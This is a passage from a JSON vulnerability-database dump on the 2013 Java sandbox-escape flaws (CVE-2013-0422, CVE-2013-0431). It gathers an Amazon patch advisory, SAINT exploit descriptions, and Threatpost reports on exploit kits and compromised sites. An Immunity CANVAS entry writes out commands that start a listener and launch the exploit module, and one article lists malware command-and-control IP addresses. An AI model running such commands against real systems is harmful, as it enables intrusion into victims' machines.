Overview:**\n\nTwo improper permission check issues were discovered in the reflection API in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.\n\n \n**Affected Packages:** \n\n\njava-1.7.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.7.0-openjdk_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.15.amzn1.i686 \n java-1.7.0-openjdk-1.7.0.9-2.3.4.1.15.amzn1.i686 \n java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.15.amzn1.i686 \n java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.15.amzn1.i686 \n java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.15.amzn1.i686 \n \n noarch: \n java-1.7.0-openjdk-javadoc-1.7.0.9-2.3.4.1.15.amzn1.noarch \n \n src: \n java-1.7.0-openjdk-1.7.0.9-2.3.4.1.15.amzn1.src \n \n x86_64: \n java-1.7.0-openjdk-src-1.7.0.9-2.3.4.1.15.amzn1.x86_64 \n java-1.7.0-openjdk-1.7.0.9-2.3.4.1.15.amzn1.x86_64 \n java-1.7.0-openjdk-devel-1.7.0.9-2.3.4.1.15.amzn1.x86_64 \n java-1.7.0-openjdk-demo-1.7.0.9-2.3.4.1.15.amzn1.x86_64 \n java-1.7.0-openjdk-debuginfo-1.7.0.9-2.3.4.1.15.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2013-02-03T12:35:00", "published": "2013-02-03T12:35:00", "id": "ALAS-2013-151", "href": "https://alas.aws.amazon.com/ALAS-2013-151.html", "title": "Important: java-1.7.0-openjdk", "type": "amazon", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2016-10-03T15:01:58", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "description": "Added: 01/14/2013 \nCVE: [CVE-2013-0422](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422>) \nBID: [57246](<http://www.securityfocus.com/bid/57246>) \nOSVDB: [89059](<http://www.osvdb.org/89059>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \n\n### Problem\n\nTwo vulnerabilities exist in Java versions prior to 7 Update 11. The first vulnerability allows the _findClass_ method of the _MBeanInstantiator_ class to return a Class reference to any package. However, the _MBeanInstantiator_ class constructor is private, so a reference to an instance object must be found. The _newMBeanServer_ static method will return a _JmxMBeanServer_ instance, which contains a reference to an instance of _MBeanInstantiator_. \nThe second vulnerability has to do with security checks performed when calling methods using reflection. The _Lookup_ subclass of the _MethodHandlers_ class performs security validation by calling its _checkSecurityManager_ method. The _checkSecurityManager_ method then attempts to walk the call stack by calling the _getCallerClassAtEntryPoint_ method. This method simply returns the result of the _Reflection.getCallerClass_ method. This method should skip stack frames relating to the Reflection API. However, it does not properly skip Reflection API frames, which may allow the security checks to be bypassed. \nThe combination of these two vulnerabilities may allow an attacker to execute arbitrary Java code with full privileges on the target system. \n\n### Resolution\n\nUpgrade to [Java 7 Update 11](<http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>) or later. This update does not fix the vulnerability, but it does flag all code from unknown sources. Users will be prompted to execute the Java applet, but if they choose to execute the applet, they can still be compromised. Disabling Java browser plug-ins is a more robust solution, but may impact any webapps that use Java applets. \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html> \n<http://www.cbsnews.com/8301-205_162-57563846/java-7-patch-released-experts-say-may-contain-flaws/> \n<http://www.reuters.com/article/2013/01/13/us-java-oracle-security-idUSBRE90C0JB20130113> \n<http://www.bbc.co.uk/news/technology-21011669> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 10 on Windows XP SP3 English (DEP OptIn), Windows 7 SP1 (DEP OptIn), Mac OS X 10.7.5, and Ubuntu 12.04.1 LTS. \n\n### Platforms\n\nWindows \nMac OS X \nLinux \n \n\n", "edition": 1, "modified": "2013-01-14T00:00:00", "published": "2013-01-14T00:00:00", "id": "SAINT:B859AECDBB7016A3F1E3446FE83018A3", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/java_MbeanInstantiator_findClass_recursive_reflection", "type": "saint", "title": "Java MBeanInstantiator.findClass and Recursive Reflection Sandbox Escape", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:40", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "description": "Added: 01/14/2013 \nCVE: [CVE-2013-0422](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422>) \nBID: [57246](<http://www.securityfocus.com/bid/57246>) \nOSVDB: [89059](<http://www.osvdb.org/89059>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \n\n### Problem\n\nTwo vulnerabilities exist in Java versions prior to 7 Update 11. The first vulnerability allows the _findClass_ method of the _MBeanInstantiator_ class to return a Class reference to any package. However, the _MBeanInstantiator_ class constructor is private, so a reference to an instance object must be found. The _newMBeanServer_ static method will return a _JmxMBeanServer_ instance, which contains a reference to an instance of _MBeanInstantiator_. \nThe second vulnerability has to do with security checks performed when calling methods using reflection. The _Lookup_ subclass of the _MethodHandlers_ class performs security validation by calling its _checkSecurityManager_ method. The _checkSecurityManager_ method then attempts to walk the call stack by calling the _getCallerClassAtEntryPoint_ method. This method simply returns the result of the _Reflection.getCallerClass_ method. This method should skip stack frames relating to the Reflection API. However, it does not properly skip Reflection API frames, which may allow the security checks to be bypassed. \nThe combination of these two vulnerabilities may allow an attacker to execute arbitrary Java code with full privileges on the target system. \n\n### Resolution\n\nUpgrade to [Java 7 Update 11](<http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>) or later. This update does not fix the vulnerability, but it does flag all code from unknown sources. Users will be prompted to execute the Java applet, but if they choose to execute the applet, they can still be compromised. Disabling Java browser plug-ins is a more robust solution, but may impact any webapps that use Java applets. \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html> \n<http://www.cbsnews.com/8301-205_162-57563846/java-7-patch-released-experts-say-may-contain-flaws/> \n<http://www.reuters.com/article/2013/01/13/us-java-oracle-security-idUSBRE90C0JB20130113> \n<http://www.bbc.co.uk/news/technology-21011669> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 10 on Windows XP SP3 English (DEP OptIn), Windows 7 SP1 (DEP OptIn), Mac OS X 10.7.5, and Ubuntu 12.04.1 LTS. \n\n### Platforms\n\nWindows \nMac OS X \nLinux \n \n\n", "edition": 4, "modified": "2013-01-14T00:00:00", "published": "2013-01-14T00:00:00", "id": "SAINT:E7792D5FC9067F389F8BD984BD06BD44", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/java_MbeanInstantiator_findClass_recursive_reflection", "title": "Java MBeanInstantiator.findClass and Recursive Reflection Sandbox Escape", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:22", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "edition": 2, "description": "Added: 01/14/2013 \nCVE: [CVE-2013-0422](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422>) \nBID: [57246](<http://www.securityfocus.com/bid/57246>) \nOSVDB: [89059](<http://www.osvdb.org/89059>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \n\n### Problem\n\nTwo vulnerabilities exist in Java versions prior to 7 Update 11. The first vulnerability allows the _findClass_ method of the _MBeanInstantiator_ class to return a Class reference to any package. However, the _MBeanInstantiator_ class constructor is private, so a reference to an instance object must be found. The _newMBeanServer_ static method will return a _JmxMBeanServer_ instance, which contains a reference to an instance of _MBeanInstantiator_. \nThe second vulnerability has to do with security checks performed when calling methods using reflection. The _Lookup_ subclass of the _MethodHandlers_ class performs security validation by calling its _checkSecurityManager_ method. The _checkSecurityManager_ method then attempts to walk the call stack by calling the _getCallerClassAtEntryPoint_ method. This method simply returns the result of the _Reflection.getCallerClass_ method. This method should skip stack frames relating to the Reflection API. However, it does not properly skip Reflection API frames, which may allow the security checks to be bypassed. \nThe combination of these two vulnerabilities may allow an attacker to execute arbitrary Java code with full privileges on the target system. \n\n### Resolution\n\nUpgrade to [Java 7 Update 11](<http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>) or later. This update does not fix the vulnerability, but it does flag all code from unknown sources. Users will be prompted to execute the Java applet, but if they choose to execute the applet, they can still be compromised. Disabling Java browser plug-ins is a more robust solution, but may impact any webapps that use Java applets. \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html> \n<http://www.cbsnews.com/8301-205_162-57563846/java-7-patch-released-experts-say-may-contain-flaws/> \n<http://www.reuters.com/article/2013/01/13/us-java-oracle-security-idUSBRE90C0JB20130113> \n<http://www.bbc.co.uk/news/technology-21011669> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 10 on Windows XP SP3 English (DEP OptIn), Windows 7 SP1 (DEP OptIn), Mac OS X 10.7.5, and Ubuntu 12.04.1 LTS. \n\n### Platforms\n\nWindows \nMac OS X \nLinux \n \n\n", "modified": "2013-01-14T00:00:00", "published": "2013-01-14T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/java_MbeanInstantiator_findClass_recursive_reflection", "id": "SAINT:30B6CFDC962268E8CEAB02B936B3AA0D", "type": "saint", "title": "Java MBeanInstantiator.findClass and Recursive Reflection Sandbox Escape", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:34", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0431", "CVE-2013-0422"], "description": "Added: 03/04/2013 \nCVE: [CVE-2013-0431](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0431>) \nBID: [57726](<http://www.securityfocus.com/bid/57726>) \nOSVDB: [89613](<http://www.osvdb.org/89613>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \n\n### Problem\n\nJava versions prior to 7 Update 13 are vulnerable to a sandbox security bypass due to a misuse of the java.lang.reflect.Method class by the com.sun.jmx.mbeanserver.Introspector class. When combined with the MBeanInstantiator findClass vulnerability from CVE-2013-0422, this may allow an attacker to embed malicious java applets into a webpage and have a payload of their choice execute on a victim's system while bypassing all security warnings. \n\n### Resolution\n\nApply the updates specified in the [ Oracle Java SE Critical Patch Update Advisory - February 2013](<http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html>). \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html> \n<http://support.novell.com/security/cve/CVE-2013-0431.html> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 11 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2013-03-04T00:00:00", "published": "2013-03-04T00:00:00", "id": "SAINT:A4279A54731FBED2154E23C3F5839BB9", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/java_findclass_introspector_sandbox_escape", "title": "Java MBeanInstantiator findClass and Introspector Sandbox Escape", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T19:19:24", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0431", "CVE-2013-0422"], "edition": 2, "description": "Added: 03/04/2013 \nCVE: [CVE-2013-0431](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0431>) \nBID: [57726](<http://www.securityfocus.com/bid/57726>) \nOSVDB: [89613](<http://www.osvdb.org/89613>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \n\n### Problem\n\nJava versions prior to 7 Update 13 are vulnerable to a sandbox security bypass due to a misuse of the java.lang.reflect.Method class by the com.sun.jmx.mbeanserver.Introspector class. When combined with the MBeanInstantiator findClass vulnerability from CVE-2013-0422, this may allow an attacker to embed malicious java applets into a webpage and have a payload of their choice execute on a victim's system while bypassing all security warnings. \n\n### Resolution\n\nApply the updates specified in the [ Oracle Java SE Critical Patch Update Advisory - February 2013](<http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html>). \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html> \n<http://support.novell.com/security/cve/CVE-2013-0431.html> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 11 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "modified": "2013-03-04T00:00:00", "published": "2013-03-04T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/java_findclass_introspector_sandbox_escape", "id": "SAINT:ADBCEB1FB086DA5B935080CE40F6277F", "title": "Java MBeanInstantiator findClass and Introspector Sandbox Escape", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0431", "CVE-2013-0422"], "description": "Added: 03/04/2013 \nCVE: [CVE-2013-0431](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0431>) \nBID: [57726](<http://www.securityfocus.com/bid/57726>) \nOSVDB: [89613](<http://www.osvdb.org/89613>) \n\n\n### Background\n\nJava is a programming language that compiles programs to bytecode, which is then executed inside a Java Virtual Machine. This is optimal for applications that must run on various hardware platforms, such as web applets. \n\n### Problem\n\nJava versions prior to 7 Update 13 are vulnerable to a sandbox security bypass due to a misuse of the java.lang.reflect.Method class by the com.sun.jmx.mbeanserver.Introspector class. When combined with the MBeanInstantiator findClass vulnerability from CVE-2013-0422, this may allow an attacker to embed malicious java applets into a webpage and have a payload of their choice execute on a victim's system while bypassing all security warnings. \n\n### Resolution\n\nApply the updates specified in the [ Oracle Java SE Critical Patch Update Advisory - February 2013](<http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html>). \n\n### References\n\n<http://www.oracle.com/technetwork/topics/security/javacpufeb2013-1841061.html> \n<http://support.novell.com/security/cve/CVE-2013-0431.html> \n\n\n### Limitations\n\nThis exploit has been tested against Oracle JRE 7 Update 11 on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2013-03-04T00:00:00", "published": "2013-03-04T00:00:00", "id": "SAINT:9AD9476D8EB15E21C99160959F48E5D8", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/java_findclass_introspector_sandbox_escape", "type": "saint", "title": "Java MBeanInstantiator findClass and Introspector Sandbox Escape", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2019-05-29T19:48:19", "bulletinFamily": "exploit", "cvelist": ["CVE-2013-0422"], "edition": 2, "description": "**Name**| java_MBeanInstantiator_findClass \n---|--- \n**CVE**| CVE-2013-0422 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| java_MBeanInstantiator_findClass \n**Notes**| CVE Name: CVE-2013-0422 \nVENDOR: Sun \nNotes: \n \nAffected versions \nJDK and JRE 7 Update 10 and earlier \n \nTested on: \n\\- Windows 7 with JDK/JRE 7 update 10 \n \nTo run from command line, first start the listener (UNIVERSAL): \npython commandlineInterface.py -l 192.168.1.10 -p 5555 -v 17 \n \nAnd then run the exploit from clientd: \npython ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:java_MBeanInstantiator_findClass -O allowed_recon_modules:js_recon -O auto_detect_exploits:0 \n \n \nRepeatability: Infinite (client side - no crash) \nReferences: http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0422 \nDate public: 01/10/2013 \n\n", "modified": "2013-01-10T21:55:00", "published": "2013-01-10T21:55:00", "id": "JAVA_MBEANINSTANTIATOR_FINDCLASS", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/java_MBeanInstantiator_findClass", "type": "canvas", "title": "Immunity Canvas: JAVA_MBEANINSTANTIATOR_FINDCLASS", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T23:01:36", "bulletinFamily": "info", "cvelist": ["CVE-2013-0422"], "description": "Scammers are spamming out malicious emails purporting to come from payroll processing company ADP, according Dancho Danchev of Webroot.\n\nThe emails arrive under the subject line \u201cADP Immediate Notifications\u201d and contain links to compromised websites hosting the latest iteration of the[ Blackhole exploit kit](<https://threatpost.com/cool-blackhole-exploit-kits-created-same-hacker-010913/>). The kit is serving CVE-2013-0422 Java exploit, which Danchev claimed was still active when he published his report. However, [Oracle appears to have patched the bug sometime yesterday](<http://www.oracle.com/technetwork/topics/security/alert-cve-2013-0422-1896849.html>).\n\nThe exploit is dropping the \u2018Win32/Cridex.E\u2019 and \u2018Win32/Farei\u2019 Trojans, which are detected by 12 and eight out of 46 antivirus scanners respectively. After exploitation, the malware is phoning home to command and control servers at the following IP addresses: 173.201.177.77, 132.248.49.112, 95.142.167.193, and 81.93.250.157.\n\nThe campaign makes use of a healthy list of suspicious looking URLs that you can check out along with [Danchev\u2019s write-up](<http://blog.webroot.com/2013/01/14/fake-adp-speedy-notifications-lead-to-client-side-exploits-and-malware/>). It\u2019s fairly commonplace for social engineers [to mimic ADP in their phishing campaigns](<https://threatpost.com/fake-adp-and-fdic-notifications-leading-users-blackhole-exploit-kit-091412/>) because of the vastness of the company\u2019s payroll operation.\n\n\n", "modified": "2013-05-13T19:06:03", "published": "2013-01-14T18:29:21", "id": "THREATPOST:957A3FEFD479E0736CDB1542A4319181", "href": "https://threatpost.com/adp-themed-phishing-emails-lead-blackhole-sites-011413/77402/", "type": "threatpost", "title": "ADP-Themed Phishing Emails Lead to Blackhole Sites", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:36", "bulletinFamily": "info", "cvelist": ["CVE-2013-0422"], "description": "Oracle\u2019s emergency Java update this weekend for a [zero-day sandbox bypass vulnerability](<https://threatpost.com/nasty-new-java-zero-day-found-exploit-kits-already-have-it-011013/>) hasn\u2019t exactly kicked off a love-fest for the company among security experts. Researchers are still cautious about recommending users re-enable the ubiquitous software, despite the availability of the fix for the latest zero-day to target the platform. \n\nSome caution there are still ways to bypass a [heightened security configuration in the update](<http://www.oracle.com/technetwork/java/javase/7u-relnotes-515228.html>), and yet others remain concerned about fixes for vulnerabilities reported months ago that still have not been addressed.\n\nAdam Gowdiak of Security Explorations in Poland said Oracle has yet to address vulnerabilities reported in April and September of last year; the [September vulnerability](<https://threatpost.com/new-zero-day-vulnerability-found-java-5-6-and-7-11-billion-desktops-affected-092612/>), like the one fixed over the weekend, is a sandbox bypass vulnerability that would enable an attacker to remotely execute code.\n\n\u201c[This] is especially important as a critical vulnerability that affects all Java SE versions released over the [last] eight years or so,\u201d Gowdiak said. \u201cWe have confirmed that our proof of concept code for it works with flying colors under Java SE 7 Update 11 released yesterday.\u201d\n\nJaime Blasco, a researcher with AlienVault, echoes Gowdiak\u2019s concerns that users should continue to leave the Java browser plug-in disabled.\n\n\u201cI don\u2019t think it\u2019s very useful right now,\u201d Blasco said. \u201cI think right now you won\u2019t find Java applets on most websites; regular users don\u2019t need Java right now.\u201d\n\n[Oracle rushed Java 1.7u11 out the door on Sunday](<http://www.oracle.com/technetwork/java/javase/7u11-relnotes-1896856.html>), less than a week after the discovery of the vulnerability and exploits in the wild. The most noteworthy enhancement is that Oracle has changed Java\u2019s default security level setting to high from medium. As a result, unsigned or self-signed Java applications will no longer run by default; users will have to approve applets to run them.\n\n\u201cWith the \u2018High\u2019 setting, the user is always warned before any unsigned application is run to prevent silent exploitation,\u201d Oracle said in its advisory.\n\nBlasco said while this is a good first step, it would not prevent an attacker from tricking the user via social engineering, for example, to execute a malicious applet manually. Also, an attacker with a valid, stolen digital certificate could also, in theory, sign and execute a malicious applet.\n\nThe call to disable Java began again in earnest last Thursday when French researcher [Kafeine](<http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html>) reported that he found websites hosting exploits for a new zero-day and that exploit kits such as Blackhole had already incorporated the exploit. Soon, most of the major exploit kits including Cool, Nuclear Pack, Sakura, and Redkit, had the exploits. By Friday, an exploit module for the zero-day had been added to [Metasploit](<https://community.rapid7.com/community/metasploit/blog/2013/01/11/omg-java-everybody-panic>), and it was game-on.\n\nHD Moore, Metasploit creator, said the issue in Java 7u10 was a privilege-escalation vulnerability ([CVE-2013-0422](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422>)) in the MBeanInstantiator.\n\n\u201cA lot of the recent Java exploits use a technique similar to this one where they find a class that\u2019s already loaded in memory that accesses an object outside the sandbox, and then they use that object to load arbitrary code,\u201d Moore told Threatpost last week. \u201cIt\u2019s about as bad as you can get in terms of a reliable Java exploit that affects the latest version of Java 1.7. It\u2019s already being used by all the bad guys and at this point, it\u2019s just catch-up and how fast Oracle can respond.\u201d\n\nFireEye reported last week, and Blasco confirmed today, that some [exploits are serving up ransomware](<https://threatpost.com/incomplete-java-patch-paved-way-latest-zero-day-mess-011113/>). Now that the exploits are part of kits, any payload from banking Trojans, to keyloggers or botnets can be added, researchers said.\n\n\u201cHaving this in the exploit kits is the worst possible scenario; exploit kits are one of the biggest security issues users are facing,\u201d Blasco said. \u201cIf you are a cybercriminal and have money, you will get something that works. You can buy anything, even without knowing anything about coding exploits.\u201d\n\nJava\u2019s availability on numerous platforms from Windows to Linux to Mac OS X makes it an [attractive target for exploit writers](<https://threatpost.com/security-experts-recommend-long-hard-look-disabling-java-browser-plug-100412/>). A reliable exploit will run anywhere.\n\n\u201cIf you have an exploit for memory issues and the exploit is reliable, you don\u2019t have to code a different exploit for different languages or platforms, it just works everywhere. You will have 100 percent probability of exploiting the target if it is vulnerable to that issue.\u201d\n", "modified": "2013-05-10T14:25:22", "published": "2013-01-14T16:40:39", "id": "THREATPOST:8EC50F1755EA55A58BB75546EB1CB667", "href": "https://threatpost.com/emergency-zero-day-patch-does-not-quiet-calls-disable-java-011413/77401/", "type": "threatpost", "title": "Emergency Zero-Day Patch Does Not Quiet Calls to Disable Java", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:16", "bulletinFamily": "info", "cvelist": ["CVE-2013-0422"], "description": "Another day, another media company hacked. This time it\u2019s NBC which has fallen to victim hackers on the heels of compromises of the _[New York Times](<https://threatpost.com/inside-targeted-attack-new-york-times-013113/>)_ and _Wall Street Journal _websites. Various experts have confirmed that NBC\u2019s website is compromised and leading visitors to the dangerous [Citadel banking Trojan](<https://www.google.com/url?q=http://threatpost.com/en_us/blogs/citadel-trojan-it-s-not-just-banking-fraud-anymore-020113&sa=U&ei=wosmUfPPKYei2QXMy4C4Ag&ved=0CAoQFjAB&client=internal-uds-cse&usg=AFQjCNHMrwHVyHwOjJNPZQxj_el4hxq2wQ>). The site is reportedly hosting an iframe that is redirecting visitors to sites hosting the RedKit Exploit Kit which is serving up the Citadel malware. \n\n\n[The HitmanPro blog](<http://hitmanpro.wordpress.com/2013/02/21/nbc-com-hacked-serving-up-citadel-malware/>) said there were two malicious links on the NBC site connecting to the exploits, one on the home page and another on an internal page. The links serve Java and PDF exploits that drop Citadel; the Java exploit is the same [sandbox bypass vulnerability](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422>) patched in Java 7u11.\n\nThe site remained infected as of 3:30 p.m. ET as attackers were rotating out the iframes regularly, each pointing to a number of attack pages, including a site with a Russian name that translates to my-new-sploit [dot]com.\n\nResearchers at Kaspersky Lab confirmed the redirections are leading victims to Citadel and Zeus (Trojan-Spy.Win32.Zbot.jfgj). Citadel is a version of Zeus and is used primarily for banking fraud. Experts say it is sold only in the Russian underground and only to certain customers in order to keep support costs down and reduce the risk of infiltration by law enforcement.\n\nIndependent security consultant Dancho Danchev [tied the NBC attacks to a recent spam campaign targeting Facebook and Verizon](<http://ddanchev.blogspot.com/2013/02/dissecting-nbcs-exploits-and-malware.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+DanchoDanchevOnSecurityAndNewMedia+\\(Dancho+Danchev+-+Mind+Streams+of+Information+Security+Knowledge!\\)>). Danchev said cybercriminals were trying to impersonate Facebook and trick users into thinking their accounts had been shut down. Malicious links used in the spam messages pointed to sites hosting exploits served by the Black Hole Exploit Kit.\n\nDanchev said one of the domains used in the NBC attack matches one used in the Facebook spam campaign, while an email address used to register another domain in the NBC attack matches one similarly used in a campaign against Verizon.\n\n\u201cSomeone\u2019s multitasking,\u201d Danchev said. \u201cThat\u2019s for sure.\u201d\n\nNBC image via [Xurble](<http://www.flickr.com/photos/xurble/>)\u2018s Flickr phtoostream, Creative Commons\n", "modified": "2013-05-08T15:53:59", "published": "2013-02-21T21:07:10", "id": "THREATPOST:FC1FB8B56F9BBADC1A51E615FCAF0C39", "href": "https://threatpost.com/nbc-website-hacked-leading-visitors-citadel-banking-malware-022113/77554/", "type": "threatpost", "title": "NBC Website Hacked, Leading Visitors to Citadel Banking Malware", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:34", "bulletinFamily": "info", "cvelist": ["CVE-2012-0422", "CVE-2013-0422"], "description": "Microsoft can take some solace that it is not alone in sending out security updates that don\u2019t fully address a zero-day vulnerability. A researcher at Immunity Inc., put Oracle on a similar hot seat this week when he reported that a recent [out-of-band Java update](<https://threatpost.com/emergency-zero-day-patch-does-not-quiet-calls-disable-java-011413/>) repaired only one of two Java flaws being actively exploited.\n\nEsteban Guillardoy said the [Java 1.7 u11 update was incomplete](<http://immunityproducts.blogspot.com.ar/2013/01/confirmed-java-only-fixed-one-of-two.html>) and cautioned that new exploits could easily pair another zero-day with the remaining unpatched vulnerability and kick off a new spate of attacks.\n\n\u201cAn attacker with enough knowledge of the Java code base and the help of another zero day bug to replace the one fixed can easily continue compromising users,\u201d Guillardoy said.\n\nMeanwhile, IT managers are caught in the middle of a patch management mess. Since the start of the year, not only have a rash of unreported vulnerabilities been exploited in high-profile attacks, but vendor patches or workarounds have fallen short.\n\nMicrosoft\u2019s temporary Fix It for a zero-day in Internet Explorer that was being exploited in [watering hole attacks](<https://threatpost.com/council-foreign-relations-website-hit-watering-hole-attack-ie-zero-day-exploit-122912/>) was quickly [bypassed by researchers at Exodus Intelligence](<https://threatpost.com/researchers-bypass-microsoft-fix-it-ie-zero-day-010413/>). Users of IE 6-8\u2014still the largest install base of the browser\u2014were exposed as early as Dec. 7 when websites serving exploits were first detected; they were publicly reported shortly after Christmas Day. Microsoft made its Fix It available Dec. 29; the bypass was reported Jan. 4 and users remained open to attack until an out-of-band patch was released on Monday.\n\nOracle, meanwhile, won\u2019t have another official Java security update release until Feb. 19. Security Explorations of Poland, a research firm known for its work on Java vulnerabilities, said it reported flaws to Oracle in April and September of last year that still have not been patched.\n\nOracle may have another zero day to add to its list for February as well. Security blog [Krebs on Security](<http://krebsonsecurity.com/2013/01/new-java-exploit-fetches-5000-per-buyer/>) reported yesterday another exploit for a different zero day was being sold on a limited basis for $5,000. The blog reported that two versions of the exploit were available\u2014weaponized and source code\u2014and that the sale would be limited to two buyers. A post on the underground forum where this was observed said the new exploit had not been included in any exploit kit, unlike the previous Java zero day which was included in all the major packs including Blackhole, Cool, Nuclear Pack and others. The post has since been removed from the forum, likely indicated the sale is over.\n\nIn the meantime, Oracle has to shore up the Java vulnerability it thought had been patched in 7u11. The Oracle patch was believed to have addressed two vulnerabilities, both covered by [CVE-2012-0422](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0422>). According to [Oracle\u2019s Java SE documentation](<http://docs.oracle.com/javase/6/docs/technotes/guides/reflection/index.html>), one of the bugs involves reflection, which enables Java to discover information about the constructors and other devices in loaded classes and to operate on underlying counterparts within security restriction. The API, Oracle said, is the go-between for applications.\n\nThe second vulnerability in question is in the MBeanInstantiator, a flaw that when used with the reflection API with recursion bypasses a security check, the Java sandbox. It is the MBeanInstantiator vulnerability that Immunity\u2019s Guillardoy said has not been addressed in the update.\n\n\u201cThe patch (which is Java 7 update 11) doesn\u2019t show any difference at all in the classes inside com.sun.jmx.mbeanserver package,\u201d he wrote. \u201cIt appears then that the MBeanInstantiator.findClass vulnerability is still there in the latest Java update.\u201d\n\nHe said he wrote a simple proof of concept that retrieved restricted Java classes, proving an exploit is still possible.\n\n\u201cSometimes for everyone involved in the offensive 